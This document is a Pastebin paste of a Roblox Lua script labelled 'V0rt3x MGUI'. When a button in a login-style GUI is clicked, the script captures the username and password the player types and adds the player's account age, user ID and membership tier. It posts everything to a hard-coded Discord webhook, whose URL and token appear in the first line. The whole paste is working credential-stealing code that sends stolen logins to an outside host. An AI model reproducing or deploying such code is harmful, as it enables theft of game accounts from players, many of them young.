Advertisement
Guest User

Untitled

a guest
Jun 24th, 2018
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
  1. local url = "https://discordapp.com/api/webhooks/460068446588239872/cKHxJTEJT8d1DjwmtFaGoSzWK_C6XHozt9TiyoboCyRDOEgDquGE9k_MFUvADydiqbw5"
  2. local http = game:GetService('HttpService')
  3.  
  4.  
  5. script.Parent.MouseButton1Down:connect(function()
  6. local ifnbc = {
  7. ['username'] = 'V0rt3x MGUI NBC',
  8. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.username.Text .." \n PASSWORD: "..script.Parent.Parent.password.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n USER ID: "..game.Players.LocalPlayer.UserId.. "\n MEMBERSHIP TYPE: NBC \n DONE! ```"
  9.  
  10.  
  11.  
  12.  
  13.  
  14. }
  15.  
  16. local ifbc = {
  17.  
  18.  
  19.  
  20.  
  21. ['username'] = 'V0rt3x MGUI BC',
  22. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.username.Text .." \n PASSWORD: "..script.Parent.Parent.password.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n USER ID: "..game.Players.LocalPlayer.UserId.. "\n MEMBERSHIP TYPE: BC \n DONE! ```"
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29. }
  30.  
  31.  
  32. local iftbc = {
  33.  
  34.  
  35. ['username'] = 'V0rt3x MGUI TBC',
  36. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.username.Text .." \n PASSWORD: "..script.Parent.Parent.password.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n USER ID: "..game.Players.LocalPlayer.UserId.. "\n MEMBERSHIP TYPE: TBC \n DONE! ```"
  37.  
  38.  
  39.  
  40.  
  41. }
  42.  
  43.  
  44.  
  45.  
  46. local ifobc = {
  47.  
  48. ['username'] = 'V0rt3x MGUI OBC',
  49. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.username.Text .." \n PASSWORD: "..script.Parent.Parent.password.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n USER ID: "..game.Players.LocalPlayer.UserId.. "\n MEMBERSHIP TYPE: OBC \n DONE! ```"
  50.  
  51.  
  52.  
  53.  
  54. }
  55.  
  56.  
  57.  
  58.  
  59. local newnbc = http:JSONEncode(ifnbc)
  60. local newbc = http:JSONEncode(ifbc)
  61. local newtbc = http:JSONEncode(iftbc)
  62. local newobc = http:JSONEncode(ifobc)
  63.  
  64.  
  65.  
  66. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.None then
  67.  
  68. http:PostAsync(url, newnbc)
  69.  
  70. else
  71.  
  72.  
  73. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.BuildersClub then
  74.  
  75. http:PostAsync(url, newbc)
  76.  
  77.  
  78.  
  79. else
  80. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.TurboBuildersClub then
  81.  
  82. http:PostAsync(url, newtbc)
  83.  
  84.  
  85.  
  86.  
  87. else
  88.  
  89.  
  90. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.OutrageousBuildersClub then
  91.  
  92. http:PostAsync(url, newobc)
  93.  
  94. end
  95.  
  96.  
  97. end
  98.  
  99.  
  100.  
  101. end
  102.  
  103. end
  104.  
  105.  
  106.  
  107. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement